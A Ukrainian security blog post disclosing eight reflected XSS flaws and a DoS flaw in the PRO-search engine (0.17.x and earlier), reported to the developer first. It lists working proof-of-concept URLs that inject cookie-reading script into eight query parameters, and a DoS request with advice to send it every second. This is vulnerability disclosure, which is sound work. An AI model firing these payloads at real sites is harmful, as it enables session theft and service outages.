Уразливості в PRO-search
19:22 24.12.200719.08.2007
Раніше я вже писав про XSS уразливість в PRO-search. І ось нещодавно, 11.08.2007, я знайшов нові уразливості в пошуковому движку PRO-search. Всього виявив 8 Cross-Site Scripting та одну Denial of Service уразливість.
Деталі уразливостей з’являться пізніше. Розробнику системи я вже про них повідомив.
24.12.2007
XSS:
Уразливості на головній сторінці в параметрах prot, host, path, name, ext, size, search_days, show_page.
http://site/?prot=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/?host=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/?path=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/?name=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/?ext=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/?size=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/?search_days=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/?show_page=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Denial of Service:
http://site/?show_page=20000&time=0
Пошуковець шукає по всім файлам, що може призвести до DoS (чим більше значення show_page, тим більша затримка сервера). DoS короткотривалий, тому для проведення DoS атаки потрібно регулярно (щосекундно) посилати запит до сервера.
Уразливі версії PRO-search 0.17.x та усі попередні версії.